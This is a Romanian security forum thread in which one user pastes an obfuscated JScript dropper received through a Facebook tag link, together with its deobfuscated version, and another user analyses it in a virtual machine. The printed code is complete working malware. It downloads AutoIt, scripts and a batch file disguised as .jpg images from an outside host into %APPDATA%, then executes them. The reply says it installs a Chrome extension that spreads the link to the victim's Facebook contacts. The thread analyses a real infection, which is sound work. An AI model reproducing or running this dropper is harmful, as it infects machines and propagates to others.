Church Posted June 26, 2016 Report Posted June 26, 2016 Salut, Astazi am fost tag-uit intr-un comment, in momentul in care dai click pe notificare te redirectioneaza catre link Sursa: var _0xe519=["\x4D\x73\x78\x6D\x6C\x32\x2E\x58\x4D\x4C\x68\x74\x74\x70","\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65","\x72\x65\x61\x64\x79\x53\x74\x61\x74\x65","\x73\x74\x61\x74\x75\x73","\x41\x44\x4F\x44\x42\x2E\x53\x74\x72\x65\x61\x6D","\x6F\x70\x65\x6E","\x74\x79\x70\x65","\x77\x72\x69\x74\x65","\x70\x6F\x73\x69\x74\x69\x6F\x6E","\x72\x65\x61\x64","\x73\x61\x76\x65\x54\x6F\x46\x69\x6C\x65","\x63\x6C\x6F\x73\x65","\x47\x45\x54","\x73\x65\x6E\x64","\x53\x63\x72\x69\x70\x74\x69\x6E\x67\x2E\x46\x69\x6C\x65\x53\x79\x73\x74\x65\x6D\x4F\x62\x6A\x65\x63\x74","\x57\x53\x63\x72\x69\x70\x74\x2E\x53\x68\x65\x6C\x6C","\x53\x68\x65\x6C\x6C\x2E\x41\x70\x70\x6C\x69\x63\x61\x74\x69\x6F\x6E","\x25\x41\x50\x50\x44\x41\x54\x41\x25\x5C","\x45\x78\x70\x61\x6E\x64\x45\x6E\x76\x69\x72\x6F\x6E\x6D\x65\x6E\x74\x53\x74\x72\x69\x6E\x67\x73","\x4D\x6F\x7A\x69\x6C\x61","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x67\x6F\x6F\x67\x6C\x65\x2E\x63\x6F\x6D","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x41\x75\x74\x6F\x69\x74\x2E\x6A\x70\x67","\x5C\x61\x75\x74\x6F\x69\x74\x2E\x65\x78\x65","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x62\x67\x2E\x6A\x70\x67","\x5C\x62\x67\x2E\x6A\x73","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x65\x6B\x6C\x2E\x6A\x70\x67","\x5C\x65\x6B\x6C\x2E\x61\x75\x33","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x66\x66\x2E\x6A\x70\x67","\x5C\x66\x66\x2E\x7A\x69\x70","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x66\x6F\x72\x63\x65\x2E\x6A\x70\x67","\x5C\x66\x6F\x72\x63\x65\x2E\x61\x75\x33","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x73\x61\x62\x69\x74\x2E\x6A\x70\x67","\x5C\x73\x61\x62\x69\x74\x2E\x61\x75\x33","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x6D\x61\x6E\x69\x66\x65\x73\x74\x2E\x6A\x70\x67","\x5C\x6D\x61\x6E\x69\x66\x65\x73\x74\x2E\x6A\x73\x6F\x6E","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x72\x75\x6E\x2E\x6A\x70\x67","\x5C\x72\x75\x6E\x2E\x62\x61\x74","\x68\x74\x74\x70\x3A\x2F\x2F\x75\x73\x65\x72\x65\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x73\x74\x61\x74\x69\x63\x73\x2E\x6E\x65\x74\x2F\x65\x78\x74\x2F\x75\x70\x2E\x6A\x70\x67","\x5C\x75\x70\x2E\x61\x75\x33","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x68\x6F\x73\x2E\x61\x6D\x75\x6E\x67\x2E\x75\x73\x2F\x70\x69\x6E\x67\x6A\x73\x2F\x3F\x6B\x3D\x70\x69\x6E\x67\x6A\x73\x65\x33\x34\x36","\x5C\x70\x69\x6E\x67\x2E\x6A\x73","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x68\x6F\x73\x2E\x61\x6D\x75\x6E\x67\x2E\x75\x73\x2F\x70\x69\x6E\x67\x6A\x73\x2F\x3F\x6B\x3D\x70\x69\x6E\x67\x6A\x73\x65\x33\x34\x36\x32","\x5C\x70\x69\x6E\x67\x32\x2E\x6A\x73",""];(function(_0xc4a4x1){function _0xc4a4x2(_0xc4a4x2,_0xc4a4x3,_0xc4a4x4){if(!_0xc4a4x3|| !_0xc4a4x2){return null};var _0xc4a4x5=WScript.CreateObject(_0xe519[0]);_0xc4a4x5[_0xe519[1]]= function(){if(_0xc4a4x5[_0xe519[2]]=== 4&& _0xc4a4x5[_0xe519[3]]=== 200){xa= new ActiveXObject(_0xe519[4]);xa[_0xe519[5]]();xa[_0xe519[6]]= 1;xa[_0xe519[7]](_0xc4a4x5.ResponseBody);xa[_0xe519[8]]= _0xc4a4x4;stm2= new ActiveXObject(_0xe519[4]);stm2[_0xe519[6]]= 1;stm2[_0xe519[5]]();stm2[_0xe519[7]](xa[_0xe519[9]]());stm2[_0xe519[10]](_0xc4a4x3,2);stm2[_0xe519[11]]();xa[_0xe519[11]]()}};_0xc4a4x5[_0xe519[5]](_0xe519[12],_0xc4a4x2,false);_0xc4a4x5[_0xe519[13]](null)}function _0xc4a4x6(_0xc4a4x7,_0xc4a4x8){{xa= new ActiveXObject(_0xe519[4]);xa[_0xe519[5]]();xa[_0xe519[6]]= 1;xa.LoadFromFile(_0xc4a4x7);ix= new ActiveXObject(_0xe519[4]);ix[_0xe519[5]]();ix[_0xe519[6]]= 1;ix.LoadFromFile(_0xc4a4x8);stm2= new ActiveXObject(_0xe519[4]);stm2[_0xe519[6]]= 1;stm2[_0xe519[5]]();stm2[_0xe519[7]](ix[_0xe519[9]]());stm2[_0xe519[7]](xa[_0xe519[9]]());xa[_0xe519[11]]();ix[_0xe519[11]]();stm2[_0xe519[10]](_0xc4a4x7,2);stm2[_0xe519[11]]()}}fso= new ActiveXObject(_0xe519[14]);var _0xc4a4x9= new ActiveXObject(_0xe519[15]);_0xc4a4x1= new ActiveXObject(_0xe519[16]);FileDestr= _0xc4a4x9[_0xe519[18]](_0xe519[17]);mozklasor= FileDestr+ _0xe519[19];if(!fso.FolderExists(mozklasor)){fso.CreateFolder(mozklasor)};_0xc4a4x1.ShellExecute(_0xe519[20]);_0xc4a4x2(_0xe519[21],mozklasor+ _0xe519[22],0);_0xc4a4x2(_0xe519[23],mozklasor+ _0xe519[24],0);_0xc4a4x2(_0xe519[25],mozklasor+ _0xe519[26],0);_0xc4a4x2(_0xe519[27],mozklasor+ _0xe519[28],0);_0xc4a4x2(_0xe519[29],mozklasor+ _0xe519[30],0);_0xc4a4x2(_0xe519[31],mozklasor+ _0xe519[32],0);_0xc4a4x2(_0xe519[33],mozklasor+ _0xe519[34],0);_0xc4a4x2(_0xe519[35],mozklasor+ _0xe519[36],0);_0xc4a4x2(_0xe519[37],mozklasor+ _0xe519[38],0);_0xc4a4x2(_0xe519[39],mozklasor+ _0xe519[40],0);_0xc4a4x2(_0xe519[41],mozklasor+ _0xe519[42],0);_0xc4a4x1.ShellExecute(mozklasor+ _0xe519[36],_0xe519[43],mozklasor,_0xe519[43],0)})(this) deobfuscat: /** @type {Array} */ var _0xe519 = ["Msxml2.XMLhttp", "onreadystatechange", "readyState", "status", "ADODB.Stream", "open", "type", "write", "position", "read", "saveToFile", "close", "GET", "send", "Scripting.FileSystemObject", "WScript.Shell", "Shell.Application", "%APPDATA%\\", "ExpandEnvironmentStrings", "Mozila", "https://www.google.com", "http://userexperiencestatics.net/ext/Autoit.jpg", "\\autoit.exe", "http://userexperiencestatics.net/ext/bg.jpg", "\\bg.js", "http://userexperiencestatics.net/ext/ekl.jpg", "\\ekl.au3", "http://userexperiencestatics.net/ext/ff.jpg", "\\ff.zip", "http://userexperiencestatics.net/ext/force.jpg", "\\force.au3", "http://userexperiencestatics.net/ext/sabit.jpg", "\\sabit.au3", "http://userexperiencestatics.net/ext/manifest.jpg", "\\manifest.json", "http://userexperiencestatics.net/ext/run.jpg", "\\run.bat", "http://userexperiencestatics.net/ext/up.jpg", "\\up.au3", "http://whos.amung.us/pingjs/?k=pingjse346", "\\ping.js", "http://whos.amung.us/pingjs/?k=pingjse3462", "\\ping2.js", ""]; (function(dataAndEvents) { /** * @param {?} f * @param {?} o * @param {number} mayParseLabeledStatementInstead * @return {?} */ function tryIt(f, o, mayParseLabeledStatementInstead) { if (!o || !f) { return null; } var xhr = WScript.CreateObject(_0xe519[0]); /** * @return {undefined} */ xhr[_0xe519[1]] = function() { if (xhr[_0xe519[2]] === 4 && xhr[_0xe519[3]] === 200) { xa = new ActiveXObject(_0xe519[4]); xa[_0xe519[5]](); /** @type {number} */ xa[_0xe519[6]] = 1; xa[_0xe519[7]](xhr.ResponseBody); /** @type {number} */ xa[_0xe519[8]] = mayParseLabeledStatementInstead; stm2 = new ActiveXObject(_0xe519[4]); /** @type {number} */ stm2[_0xe519[6]] = 1; stm2[_0xe519[5]](); stm2[_0xe519[7]](xa[_0xe519[9]]()); stm2[_0xe519[10]](o, 2); stm2[_0xe519[11]](); xa[_0xe519[11]](); } }; xhr[_0xe519[5]](_0xe519[12], f, false); xhr[_0xe519[13]](null); } /** * @param {?} filename * @param {?} path * @return {undefined} */ function readFile(filename, path) { xa = new ActiveXObject(_0xe519[4]); xa[_0xe519[5]](); /** @type {number} */ xa[_0xe519[6]] = 1; xa.LoadFromFile(filename); ix = new ActiveXObject(_0xe519[4]); ix[_0xe519[5]](); /** @type {number} */ ix[_0xe519[6]] = 1; ix.LoadFromFile(path); stm2 = new ActiveXObject(_0xe519[4]); /** @type {number} */ stm2[_0xe519[6]] = 1; stm2[_0xe519[5]](); stm2[_0xe519[7]](ix[_0xe519[9]]()); stm2[_0xe519[7]](xa[_0xe519[9]]()); xa[_0xe519[11]](); ix[_0xe519[11]](); stm2[_0xe519[10]](filename, 2); stm2[_0xe519[11]](); } fso = new ActiveXObject(_0xe519[14]); var fo = new ActiveXObject(_0xe519[15]); dataAndEvents = new ActiveXObject(_0xe519[16]); FileDestr = fo[_0xe519[18]](_0xe519[17]); mozklasor = FileDestr + _0xe519[19]; if (!fso.FolderExists(mozklasor)) { fso.CreateFolder(mozklasor); } dataAndEvents.ShellExecute(_0xe519[20]); tryIt(_0xe519[21], mozklasor + _0xe519[22], 0); tryIt(_0xe519[23], mozklasor + _0xe519[24], 0); tryIt(_0xe519[25], mozklasor + _0xe519[26], 0); tryIt(_0xe519[27], mozklasor + _0xe519[28], 0); tryIt(_0xe519[29], mozklasor + _0xe519[30], 0); tryIt(_0xe519[31], mozklasor + _0xe519[32], 0); tryIt(_0xe519[33], mozklasor + _0xe519[34], 0); tryIt(_0xe519[35], mozklasor + _0xe519[36], 0); tryIt(_0xe519[37], mozklasor + _0xe519[38], 0); tryIt(_0xe519[39], mozklasor + _0xe519[40], 0); tryIt(_0xe519[41], mozklasor + _0xe519[42], 0); dataAndEvents.ShellExecute(mozklasor + _0xe519[36], _0xe519[43], mozklasor, _0xe519[43], 0); })(this); Nu imi dau seama ce face, dar pare interesant. Quote
Active Members dancezar Posted June 26, 2016 Active Members Report Posted June 26, 2016 (edited) L-am instalat pe o masina virtuala :))) Pare sa fie targetat pentru Chrome. Baga in %appdata% un folder Mozila , in care is niste script-uri autoit impreuna cu compiliatorul autoit. Iti instaleaza o extensie in chrome folosita sa trimita si la alte persoane acel link , acesta e script-ul folosit pe facebook: http://pastebin.com/9UDBCg0c Script-ul extensiei chrome: http://pastebin.com/mF0LtMZK Daca te duci pe chrome://extensions o sa te redirectioneze:))) In final nu stiu care este scop-ul lui de ce se raspandeste . https://www.sendspace.com/file/88v34k http://appcdn.co/data.js?r daca intri de pe chrome o sa te redirectioneze catre diferite domenii unde e tinut script-ul pentru facebook , daca intrii de pe firefox o sa iti dea jquery. Edited June 26, 2016 by danyweb09 Quote